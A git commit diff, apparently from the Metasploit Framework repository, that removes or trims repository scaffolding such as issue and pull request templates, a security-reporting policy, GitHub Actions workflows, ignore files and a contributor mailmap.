Bump version to 4.9.2

2014-04-10 17:45:42 -05:00
11487 changed files with 427969 additions and 1512236 deletions
@@ -1,105 +0,0 @@
-.dockerignore
-.gitignore
-.env*
-docker-compose*.yml
-docker/
-!docker/msfconsole.rc
-!docker/entrypoint.sh
-!docker/database.yml
-Dockerfile
-README.md
-.git/
-.github/
-.ruby-version
-.ruby-gemset
-
-.bundle
-Gemfile.local
-Gemfile.local.lock
-# Rubymine project directory
-.idea
-# Sublime Text project directory (not created by ST by default)
-.sublime-project
-# RVM control file, keep this to avoid backdooring Metasploit
-.rvmrc
-# Allow for a local choice of (unsupported / semi-supported) ruby versions
-# See PR #4136 for usage, but example usage for rvm:
-#   rvm --create --versions-conf use 2.1.4@metasploit-framework
-# Because rbenv doesn't use .versions.conf, to achieve this same functionality, run:
-#   rbenv shell 2.1.4
-.versions.conf
-# YARD cache directory
-.yardoc
-# Mac OS X files
-.DS_Store
-# database config for testing
-config/database.yml
-# target config file for testing
-features/support/targets.yml
-# simplecov coverage data
-coverage/
-doc/
-external/source/meterpreter/java/bin
-external/source/meterpreter/java/build
-external/source/meterpreter/java/extensions
-external/source/javapayload/bin
-external/source/javapayload/build
-# Java binary ignores. Replace the 5 above with this once we're merged.
-external/source/javapayload/*/.classpath
-external/source/javapayload/*/.project
-external/source/javapayload/*/.settings
-external/source/javapayload/*/bin
-external/source/javapayload/*/target
-external/source/javapayload/*/*/.classpath
-external/source/javapayload/*/*/.project
-external/source/javapayload/*/*/.settings
-external/source/javapayload/*/*/bin
-external/source/javapayload/*/*/target
-# Packaging directory
-pkg
-tags
-*.swp
-*.orig
-*.rej
-*~
-# Ignore backups of retabbed files
-*.notab
-
-# ignore Visual Studio external source garbage
-*.suo
-*.sdf
-*.opensdf
-*.user
-
-# Rails log directory
-/log
-# Rails tmp directory
-/tmp
-
-# ignore release/debug folders for exploits
-external/source/exploits/**/Debug
-external/source/exploits/**/Release
-
-# Avoid checking in Meterpreter binaries. These are supplied upstream by
-# the metasploit-payloads gem.
-data/meterpreter/*.dll
-data/meterpreter/*.php
-data/meterpreter/*.py
-data/meterpreter/*.bin
-data/meterpreter/*.jar
-data/meterpreter/*.lso
-data/android
-data/java
-
-# Avoid checking in Meterpreter libs that are built from
-# private source. If you're interested in this functionality,
-# check out Metasploit Pro: https://metasploit.com/download
-data/meterpreter/ext_server_pivot.*.dll
-
-# Avoid checking in metakitty, the source for
-# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
-/metakitty
-.vagrant
-
-# no need for rspecs
-spec/
@@ -1,15 +0,0 @@
-# This file aims to document any commits which should be ignored from Git/Github history
-# Only whitespace changes should be added to this file where possible
-#
-# Additional details:
-#    https://docs.github.com/en/repositories/working-with-files/using-files/viewing-a-file#ignore-commits-in-the-blame-view
-# 
-
-# 2013: Retabbing the majority of Metasploit Framework to use two-space soft tabs instead of hard tabs
-7e5e0f7fc814fee55a1eca148c51f2344da65e59
-41e4375e43443bb568729a3079d3bf9944cbc669
-84aaf2334ae2de73f27999d4c003448c8e891d3a
-9f3a5dc5d0424c2c1a067b140b1642319dee65c2
-
-# 2022: Fixing whitespace on the tests folder with "rubocop --fix-layout test"
-29cc349649f978304712dd0c31dc8861e9627209
@@ -1,54 +0,0 @@
---
-name: Bug Report 🐞
-about: Something isn't working as expected? Here is the right place to report.
-labels: "bug"
---
-
-<!--
-  Please fill out each section below, otherwise, your issue will be closed. This info allows Metasploit maintainers to diagnose (and fix!) your issue as quickly as possible.
-
-  Useful Links:
-  - Wiki: https://docs.metasploit.com/
-  - Reporting a Bug: https://docs.metasploit.com/docs/using-metasploit/getting-started/reporting-a-bug.html
-
-  Before opening a new issue, please search existing issues: https://github.com/rapid7/metasploit-framework/issues
-->
-
-## Steps to reproduce
-
-How'd you do it?
-
-1. ...
-2. ...
-
-This section should also tell us any relevant information about the
-environment; for example, if an exploit that used to work is failing,
-tell us the victim operating system and service versions.
-
-## Were you following a specific guide/tutorial or reading documentation?
-
-If yes link the guide/tutorial or documentation you were following here, otherwise you may omit this section.
-
-## Expected behavior
-
-What should happen?
-
-## Current behavior
-
-What happens instead?
-
-### Metasploit version
-
-Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).
-
-## Additional Information
-If your version is less than `5.0.96`, please update to the latest version and ensure your issue is still present.
-
-If the issue is encountered within `msfconsole`, please run the `debug` command using the instructions below. If the issue is encountered outisde `msfconsole`, or the issue causes `msfconsole` to crash on startup, please delete this section.
-
-1. Start `msfconsole`
-2. Run the command `set loglevel 3`
-3. Take the steps necessary recreate your issue
-4. Run the `debug` command
-5. Copy all the output below the `===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===` line and make sure to **REMOVE ANY SENSITIVE INFORMATION.**
-6. Replace these instructions and the paragraph above with the output from step 5.
@@ -1,5 +0,0 @@
-blank_issues_enabled: false
-contact_links:
-  - name: Termux Issues?
-    url: https://github.com/rapid7/metasploit-framework/issues/11023
-    about: Termux is not officially supported, check here for more info
@@ -1,42 +0,0 @@
---
-name: Documentation 📝
-about: Suggest better docs coverage for a particular tool or process.
-labels: "suggestion-docs"
---
-
-<!--
-  To make it easier for us to help you, please include as much useful information as possible.
-
-  Useful Links:
-  - Wiki: https://docs.metasploit.com/
-
-  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
-->
-
-## Summary
-
-What problem(s) did you run into that caused you to request additional documentation? What questions do you think we should answer? What, if any, existing documentation relates to this proposal?
-
-Some recommended topics to cover:
-
- List the topics you think should be here.
- This list does not need to be exhaustive!
-
-### Motivation
-
-Why should we document this and who will benefit from it?
-
-## Steps to resolve this issue
-
-<!-- Your suggestion may require additional steps. Remember to add any relevant labels. Note that you'll need to fill in the link to a similar article as well as the correct section. Don't worry if you're not yet sure about these, especially if this is a brand new topic! -->
-
-### Draft the doc
-
- [ ] Write the doc, following the format listed in these resources:
-  - [Overview on contributing module documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html)
-  - [Docs Templates](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
-  - [Example of a similar article]()
-
-### Open a pull request
-
- [ ] Open a pull request with your work including the words "closes #[this issue's number]" in the pull request description
@@ -1,26 +0,0 @@
---
-name: Feature Suggestion 💡
-about: Suggest a new idea for the project.
-labels: "suggestion-feature"
---
-
-<!--
-  To make it easier for us to help you, please include as much useful information as possible.
-
-  Useful Links:
-  - Wiki: https://docs.metasploit.com/
-
-  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
-->
-
-## Summary
-
-Brief explanation of the feature.
-
-### Basic example
-
-If the proposal involves a new or changed API, include a basic code example. Omit this section if it's not applicable.
-
-### Motivation
-
-Why are we doing this? What use cases does it support? What is the expected outcome?
@@ -1,26 +0,0 @@
---
-name: Module Suggestion 📦
-about: Suggest a new module idea to include in framework.
-labels: "suggestion-module"
---
-
-<!--
-  To make it easier for us to help you, please include as much useful information as possible.
-
-  Useful Links:
-  - Wiki: https://docs.metasploit.com/
-
-  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
-->
-
-## Summary
-
-Brief explanation of the module.
-
-### Basic example
-
-If you have a POC, blog post or any other useful references please let us know in this section.
-
-### Motivation
-
-Why are we doing this? What use cases does it support? What is the expected outcome?
@@ -1,20 +0,0 @@
---
-name: Question 🤔
-about: Usage question or discussion about Metasploit.
-labels: "question"
---
-
-<!--
-  To make it easier for us to help you, please include as much useful information as possible.
-
-  Useful Links:
-  - Wiki: https://docs.metasploit.com/
-
-  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
-->
-
-## Summary
-
-## Relevant information
-
-<!-- Provide as much useful information as you can -->
@@ -1,34 +0,0 @@
-Tell us what this change does. If you're fixing a bug, please mention
-the github issue number.
-
-Please ensure you are submitting **from a unique branch** in your [repository](https://github.com/rapid7/metasploit-framework/pull/11086#issuecomment-445506416) to master in Rapid7's.
-
-## Verification
-
-List the steps needed to make sure this thing works
-
- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))
-
-If you are opening a PR for a new module that exploits a **specific** piece of hardware or requires a **complex or hard-to-find** testing environment, we recommend that you send us a demo of your module executing correctly. Seeing your module in action will help us review your PR faster!
-
-Specific Hardware Examples:
-* Switches
-* Routers
-* IP Cameras
-* IoT devices
-
-Complex Software Examples:
-* Expensive proprietary software
-* Software with an extensive installation process
-* Software that requires exploit testing across multiple significantly different versions
-* Software without an English language UI
-
-We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!
-
-Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
-If you wish to sanitize your pcap, please see the [wiki](https://docs.metasploit.com/docs/development/get-started/sanitizing-pcaps.html).
@@ -1,35 +0,0 @@
-# Reporting security issues
-
-Thanks for your interest in making Metasploit more secure! If you feel
-that you have found a security issue involving Metasploit, Meterpreter,
-Recog, or any other Rapid7 open source project, you are welcome to let
-us know in the way that's most comfortable for you.
-
-## Via ZenDesk
-
-You can click on the big orange button at [Rapid7's Vulnerability
-Disclosure][r7-vulns] page, which will get you to our general
-vulnerability reporting system. While this does require a (free) ZenDesk
-account to use, you'll get regular updates on your issue as our software
-support teams work through it. As it happens [that page][r7-vulns] also
-will tell you what to expect when it comes to reporting vulns, how fast
-we'll fix and respond, and all the rest, so it's a pretty good read
-regardless.
-
-## Via email
-
-If you're more of a traditionalist, you can email your finding to
-security@rapid7.com. If you like, you can use our [PGP key][pgp] to
-encrypt your messages, but we certainly don't mind cleartext reports
-over email.
-
-## NOT via GitHub Issues
-
-Please don't! Disclosing security vulnerabilities to public bug trackers
-is kind of mean, even when it's well-intentioned, since you end up
-dropping 0-day on pretty much everyone right out of the gate. We'd prefer
-you didn't!
-
-[r7-vulns]:https://www.rapid7.com/security/disclosure/
-[pgp]:https://keybase.io/rapid7/pgp_keys.asc?fingerprint=9a90aea0576cbcafa39c502ba5e16807959d3eda
-
@@ -1,59 +0,0 @@
-name: Build Docs
-
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  issues: none
-  discussions: none
-  packages: none
-  pages: none
-  pull-requests: none
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  push:
-    branches-ignore:
-      - gh-pages
-      - metakitty
-      - weekly-dependency-updates
-    paths:
-      - docs
-  pull_request:
-    branches-ignore:
-      - weekly-dependency-updates
-
-jobs:
-  # Ensures that the docs site builds successfully. Note that this workflow does not deploy the docs site.
-  build:
-    runs-on: ubuntu-latest
-    timeout-minutes: 40
-
-    strategy:
-      fail-fast: true
-      matrix:
-        ruby:
-          - 2.7
-
-    name: Ruby ${{ matrix.ruby }}
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v3
-
-      - name: Setup Ruby
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: ${{ matrix.ruby }}
-          bundler-cache: true
-          working-directory: docs
-
-      - name: build
-        working-directory: docs
-        run: |
-          bundle exec ruby build.rb
-          bundle exec ruby build.rb --production
@@ -1,220 +0,0 @@
-name: Labels
-
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  # This action can update/close issues
-  issues: write
-  discussions: none
-  packages: none
-  pages: none
-  # This action can update/close pull requests
-  pull-requests: write
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  pull_request_target:
-    types: [labeled]
-  issues:
-    types: [labeled]
-
-jobs:
-  handle-labels:
-    runs-on: ubuntu-latest
-    steps:
-      - uses: actions/github-script@v6
-        with:
-          github-token: ${{secrets.GITHUB_TOKEN}}
-          script: |
-            // NOTE: The following section is JavaScript. Note that backticks will need to be escaped within
-            // the multiline comment strings in the following config. When editing this file, using JavaScript
-            // syntax highlighting might be easier.
-            //
-            // This script has intentionally been inlined instead of using third-party Github actions for both
-            // security and performance reasons.
-            const allConfig = {
-              pullRequests: {
-                attic: {
-                  close: true,
-                  comment: `
-                    Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it \`attic\` and closed it for now.
-
-                    What does this generally mean? It could be one or more of several things:
-
-                      - It doesn't look like there has been any activity on this pull request in a while
-                      - We may not have the proper access or equipment to test this pull request, or the contributor doesn't have time to work on it right now.
-                      - Sometimes the implementation isn't quite right and a different approach is necessary.
-
-                    We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!
-                  `
-                },
-                'needs-docs': {
-                  close: false,
-                  comment: `
-                    Thanks for your pull request! Before this can be merged, we need the following documentation for your module:
-
-                    - [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
-                    - [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
-                    - [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
-                  `
-                },
-                'needs-linting': {
-                  close: false,
-                  comment: `
-                    Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.
-
-                    We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
-
-                    \`\`\`
-                    rubocop <directory or file>
-                    tools/dev/msftidy.rb <directory or file>
-                    \`\`\`
-
-                    You can automate most of these changes with the \`-a\` flag:
-
-                    \`\`\`
-                    rubocop -a <directory or file>
-                    \`\`\`
-
-                    Please update your branch after these have been made, and reach out if you have any problems.
-                  `
-                },
-                'needs-unique-branch': {
-                  close: true,
-                  comment: `
-                    Thanks for your pull request! We require for all contributed code to come from a **from a unique branch** in your repository before it can be merged.
-
-                    Please create a new branch in your fork of framework and resubmit this from that branch.
-
-                    If you are using Git on the command line that may look like:
-
-                    \`\`\`
-                    # Checkout the master branch
-                    git checkout master
-
-                    # Create a new branch for your feature
-                    git checkout -b <BRANCH_NAME>
-
-                    # Add your new files
-                    git add modules/my-cool-new-module
-
-                    # Commit your changes with a relevant message
-                    git commit
-
-                    # Push your changes to GitHub
-                    git push origin <BRANCH_NAME>
-
-                    # Now browse to the following URL and create your pull request!
-                    # - https://github.com/rapid7/metasploit-framework/pulls
-                    \`\`\`
-
-                    This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.
-
-                    Please do resubmit from a unique branch, we greatly value your contribution! :tada:
-                  `
-                },
-                'needs-testing-environment': {
-                  close: false,
-                  comment: `
-                    Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.
-
-                    We have been unable to test this module successfully. This may be due to software or hardware requirements we cannot replicate.
-
-                    To help unblock this pull request, please:
-
-                    - Comment with links to documentation on how to set up an environment, and provide exact software version numbers to use
-                    - Or comment guided steps on how to set up our environment for testing this module
-                    - Or send pcaps/screenshots/recordings of it working - you can email us msfdev[at]rapid7.com
-
-                    Once there's a clear path for testing and evaluating this module, we can progress with this further.
-                  `
-                },
-                'needs-pull-request-template': {
-                  close: false,
-                  comment: `
-                    When creating a pull request, please ensure that the default pull request template has been updated with the required details.
-                  `
-                },
-              },
-              issues: {
-                termux: {
-                  close: true,
-                  comment: `
-                    Metasploit installation on Termux is not supported. Refer to the following for more information:
-
-                    * https://github.com/rapid7/metasploit-framework/issues/11023
-                  `
-                },
-                // Used for issues that have had low effort applied, haven't followed the issue template, and there's not enough
-                // information to warrant staying open
-                'needs-issue-template': {
-                  close: true,
-                  comment: `
-                    When creating an issue, please ensure that the default issue template has been updated with the required details:
-                    https://github.com/rapid7/metasploit-framework/issues/new/choose
-
-                    Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
-                  `
-                },
-                // Used for issues that have attempted to provide some details, but more information is required. This can be
-                // useful for older issues, or issues that have been raised without following the issue template fully and have
-                // useful comments present that stop it from being closed outright.
-                'needs-more-information': {
-                  close: false,
-                  comment: `
-                    It looks like there's not enough information to replicate this issue. Please provide any relevant output and logs which may be useful in diagnosing the issue.
-
-                    This includes:
-
-                    - All of the item points within this [template](https://github.com/rapid7/metasploit-framework/blob/master/.github/ISSUE_TEMPLATE/bug_report.md)
-                    - The result of the \`debug\` command in your Metasploit console
-                    - Screenshots showing the issues you're having
-                    - Exact replication steps
-
-                    The easier it is for us to replicate and debug an issue means there's a higher chance of this issue being resolved.
-                  `
-                },
-                // Used for issues that have zero effort applied, potentially bot related
-                // https://github.com/rapid7/metasploit-framework/pull/13280#issuecomment-616842090
-                potato: {
-                  close: true,
-                  comment: `
-                    When creating an issue, please ensure that the default issue template has been updated with the required details:
-                    https://github.com/rapid7/metasploit-framework/issues/new/choose
-
-                    Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
-                  `
-                },
-              }
-            };
-
-            const issueType = context.eventName === 'issues' ? 'issues' : 'pullRequests';
-            const config = allConfig[issueType][context.payload.label.name];
-            if (!config) {
-              return;
-            }
-
-            if (config.comment) {
-              const precedingWhitespaceLength = config.comment.split("\n")[1].search(/\S/);
-              const commentWithoutPrecedingWhitespace = config.comment.split("\n").map(line => line.substring(precedingWhitespaceLength)).join("\n").trim();
-              await github.rest.issues.createComment({
-                issue_number: context.issue.number,
-                owner: context.repo.owner,
-                repo: context.repo.repo,
-                body: commentWithoutPrecedingWhitespace
-              });
-            }
-            if (config.close) {
-              await github.rest.issues.update({
-                  issue_number: context.issue.number,
-                  owner: context.repo.owner,
-                  repo: context.repo.repo,
-                  state: 'closed'
-              });
-            }
@@ -1,63 +0,0 @@
-name: Lint
-
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  issues: none
-  discussions: none
-  packages: none
-  pages: none
-  pull-requests: none
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  push:
-    branches-ignore:
-      - gh-pages
-      - metakitty
-      - weekly-dependency-updates
-  pull_request:
-    branches-ignore:
-      - weekly-dependency-updates
-
-jobs:
-  msftidy:
-    runs-on: ubuntu-latest
-    timeout-minutes: 40
-
-    strategy:
-      fail-fast: true
-      matrix:
-        ruby:
-          - 2.7
-
-    name: Lint msftidy
-    steps:
-      - name: Install system dependencies
-        run: sudo apt-get install libpcap-dev graphviz
-
-      - name: Checkout code
-        uses: actions/checkout@v3
-        # Required to checkout HEAD^ and 3a046f01dae340c124dd3895e670983aef5fe0c5 for the msftidy script
-        # https://github.com/actions/checkout/tree/5a4ac9002d0be2fb38bd78e4b4dbde5606d7042f#checkout-head
-        with:
-          fetch-depth: 0
-
-      - uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: ${{ matrix.ruby }}
-          bundler-cache: true
-        env:
-          BUNDLE_WITHOUT: "coverage development pcap"
-
-      - name: Run msftidy
-        run: |
-          ln -sf ../../tools/dev/pre-commit-hook.rb ./.git/hooks/post-merge
-          ls -la ./.git/hooks
-          ./.git/hooks/post-merge
@@ -1,55 +0,0 @@
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  # This action can update/close issues
-  issues: write
-  discussions: none
-  packages: none
-  pages: none
-  pull-requests: none
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  schedule:
-    - cron: "0 15 * * 1-5"
-
-name: Stale Bot workflow
-
-jobs:
-  build:
-    name: stale
-    runs-on: ubuntu-latest
-    steps:
-      - name: stale
-        id: stale
-        uses: actions/stale@v3
-        with:
-          repo-token: ${{ secrets.GITHUB_TOKEN }}
-          days-before-stale: 30
-          days-before-close: 30
-          operations-per-run: 75
-          stale-issue-message: |
-            Hi!
-
-            This issue has been left open with no activity for a while now.
-
-            We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
-            If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
-
-            As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
-          close-issue-message: |
-            Hi again!
-
-            It’s been 60 days since anything happened on this issue, so we are going to close it.
-            Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.
-
-            As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
-          exempt-issue-labels: |
-            discussion,not-stale,confirmed,easy,newbie-friendly,suggestion,suggestion-module,suggestion-feature,suggestion-docs,ascii-utf8-issues,database,feature,enhancement,library
-          debug-only: false
@@ -1,120 +0,0 @@
-name: Verify
-
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  issues: none
-  discussions: none
-  packages: none
-  pages: none
-  pull-requests: none
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  push:
-    branches-ignore:
-      - gh-pages
-      - metakitty
-      - weekly-dependency-updates
-  pull_request:
-    branches-ignore:
-      - weekly-dependency-updates
-
-jobs:
-  build:
-    runs-on: ubuntu-latest
-    timeout-minutes: 40
-    name: Docker Build
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v3
-
-      - name: docker-compose build
-        run: |
-          curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` > docker-compose
-          chmod +x docker-compose
-          sudo mv docker-compose /usr/bin
-
-          /usr/bin/docker-compose build
-
-  test:
-    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
-
-    services:
-      postgres:
-        image: postgres:9.6
-        ports: ["5432:5432"]
-        env:
-          POSTGRES_USER: postgres
-          POSTGRES_PASSWORD: postgres
-        options: >-
-          --health-cmd pg_isready
-          --health-interval 10s
-          --health-timeout 5s
-          --health-retries 5
-
-    strategy:
-      fail-fast: true
-      matrix:
-        ruby:
-          - 2.7
-          - 3.0
-          - 3.1
-        os:
-          - ubuntu-20.04
-          - ubuntu-latest
-        exclude:
-          - { os: ubuntu-latest, ruby: 2.7 }
-          - { os: ubuntu-latest, ruby: 3.0 }
-        include:
-          - os: ubuntu-latest
-            ruby: 3.1
-            test_cmd: 'bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" DATASTORE_FALLBACKS=1'
-        test_cmd:
-          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"
-          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"
-          # Used for testing the remote data service
-          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content" REMOTE_DB=1
-          - bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content" REMOTE_DB=1
-
-    env:
-      RAILS_ENV: test
-
-    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
-    steps:
-      - name: Install system dependencies
-        run: sudo apt-get install libpcap-dev graphviz
-
-      - name: Checkout code
-        uses: actions/checkout@v3
-
-      - name: Setup Ruby
-        env:
-          BUNDLE_WITHOUT: "coverage development pcap"
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: ${{ matrix.ruby }}
-          bundler-cache: true
-
-      - name: Create database
-        run: |
-          cp config/database.yml.github_actions config/database.yml
-          bundle exec rake --version
-          bundle exec rake db:create
-          bundle exec rake db:migrate
-          # fail build if db/schema.rb update is not committed
-          git diff --exit-code db/schema.rb
-
-      - name: ${{ matrix.test_cmd }}
-        run: |
-          echo "${CMD}"
-          bash -c "${CMD}"
-        env:
-          CMD: ${{ matrix.test_cmd }}
@@ -1,69 +0,0 @@
-# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
-permissions:
-  actions: none
-  checks: none
-  contents: none
-  deployments: none
-  id-token: none
-  # This action can update/close issues
-  issues: write
-  discussions: none
-  packages: none
-  pages: none
-  pull-requests: write
-  repository-projects: none
-  security-events: none
-  statuses: none
-
-on:
-  push:
-    branches:
-    - weekly-dependency-updates
-    paths:
-    - 'Gemfile.lock'
-
-name: Weekly dependency PR workflow
-
-jobs:
-  create-pull-request:
-    runs-on: ubuntu-latest
-    steps:
-      - name: Create Pull Request
-        uses: actions/github-script@v6
-        with:
-          script: |
-            const { repo, owner } = context.repo;
-            console.log('repo:');
-            console.log(JSON.stringify(repo, null, 4));
-            console.log('owner:');
-            console.log(JSON.stringify(owner, null, 4));
-            const hasPR = await github.rest.pulls.list({
-              owner,
-              repo,
-              head: owner + ':' + '${{ github.ref_name }}' 
-            });
-            console.log('hasPR:');
-            console.log(JSON.stringify({ data: hasPR.data, status: hasPR.status }, null, 4));
-            if (Array.isArray(hasPR.data) && !hasPR.data.length) {
-              const result = await github.rest.pulls.create({
-                title: 'Weekly dependency updates',
-                owner,
-                repo,
-                head: '${{ github.ref_name }}',
-                base: 'master',
-                body: [
-                  'This PR is auto-generated by [actions/github-script](https://github.com/actions/github-script).  ',
-                  '`bundle update` revealed the following gems have new version to be evaluated for update.'
-                ].join('\n')
-              });
-              console.log('result:');
-              console.log(JSON.stringify({ data: result.data, status: result.status }, null, 4));
-              const labelResult = await github.rest.issues.addLabels({
-                owner,
-                repo,
-                issue_number: result.data.number,
-                labels: ['automation', 'rn-no-release-notes']
-              });
-              console.log('labelResult:');
-              console.log(JSON.stringify({ data: labelResult.data, status: labelResult.status }, null, 4));
-            }
@@ -1,32 +1,20 @@
 .bundle
-Gemfile.local
-Gemfile.local.lock
 # Rubymine project directory
 .idea
-# Visual Studio Code configuration settings directory
-.vscode
 # Sublime Text project directory (not created by ST by default)
 .sublime-project
 # RVM control file, keep this to avoid backdooring Metasploit
 .rvmrc
-# Allow for a local choice of (unsupported / semi-supported) ruby versions
-# See PR #4136 for usage, but example usage for rvm:
-#   rvm --create --versions-conf use 2.1.4@metasploit-framework
-# Because rbenv doesn't use .versions.conf, to achieve this same functionality, run:
-#   rbenv shell 2.1.4
-.versions.conf
 # YARD cache directory
 .yardoc
 # Mac OS X files
 .DS_Store
 # database config for testing
 config/database.yml
-# target config file for testing
-features/support/targets.yml
-# Generated test files
-spec/dummy
 # simplecov coverage data
 coverage
+data/meterpreter/ext_server_pivot.x86.dll
+data/meterpreter/ext_server_pivot.x64.dll
 doc/
 external/source/meterpreter/java/bin
 external/source/meterpreter/java/build
@@ -60,43 +48,6 @@ tags
 *.opensdf
 *.user

-# Rails log directory
-/log
-# Rails tmp directory
-/tmp
-
 # ignore release/debug folders for exploits
 external/source/exploits/**/Debug
 external/source/exploits/**/Release
-
-# Avoid checking in Meterpreter binaries. These are supplied upstream by
-# the metasploit-payloads gem.
-data/meterpreter/*.dll
-data/meterpreter/*.php
-data/meterpreter/*.py
-data/meterpreter/*.bin
-data/meterpreter/*.jar
-data/meterpreter/*.lso
-data/android
-data/java
-
-# Avoid checking in Meterpreter libs that are built from
-# private source. If you're interested in this functionality,
-# check out Metasploit Pro: https://metasploit.com/download
-data/meterpreter/ext_server_pivot.*.dll
-
-# Avoid checking in metakitty, the source for
-# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
-/metakitty
-.vagrant
-
-# local docker compose overrides
-docker-compose.local*
-.env
-
-# Ignore python bytecode
-*.pyc
-rspec.failures
-
-#Ignore any base disk store files
-db/modules_metadata_base.pstore
@@ -1,45 +1,29 @@
-acammack-r7 <acammack-r7@github>       <acammack@aus-mbp-1099.aus.rapid7.com>
-acammack-r7 <acammack-r7@github>       <adam_cammack@rapid7.com>
-acammack-r7 <acammack-r7@github>       <Adam_Cammack@rapid7.com>
-adamgalway-r7 <adamgalway-r7@github>   <adam_galway@rapid7.com>
-adfoster-r7 <adfoster-r7@github>       <alandavid_foster@rapid7.com>
-bcook-r7 <bcook-r7@github>             <bcook@rapid7.com>
-bcook-r7 <bcook-r7@github>             <busterb@gmail.com>
-bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>
-bwatters-r7 <bwatters-r7@github>       <bwatters@rapid7.com>
-cdelafuente-r7 <cdelafuente-r7@github> Christophe De La Fuente <christophe_delafuente@rapid7.com>
-cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
-cgranleese-r7 <cgranleese-r7@github>   <christopher_granleese@rapid7.com>
-dheiland-r7 <dheiland-r7@github>       <dh@layereddefense.com>
-dwelch-r7 <dwelch-r7@github>           <dean_welch@rapid7.com>
-ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
-gwillcox-r7 <gwillcox-r7@github>       <Grant_Willcox@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>       <James_Barnett@rapid7.com>
-jbarnett-r7 <jbarnett-r7@github>       <jbarnett@rapid7.com>
-jinq102030 <jinq102030@github>         <Jin_Qian@rapid7.com>
-jinq102030 <jinq102030@github>         <jqian@rapid7.com>
-jmartin-r7 <jmartin-r7@github>         <Jeffrey_Martin@rapid7.com>
-lsato-r7 <lsato-r7@github>             <lsato@rapid7.com>
-lvarela-r7 <lvarela-r7@github>         <“leonardo_varela@rapid7.com”>
-mkienow-r7 <mkienow-r7@github>         <matthew_kienow@rapid7.com>
-pbarry-r7 <pbarry-r7@github>           <pearce_barry@rapid7.com>
-pdeardorff-r7 <pdeardorff-r7@github>   <paul_deardorff@rapid7.com>
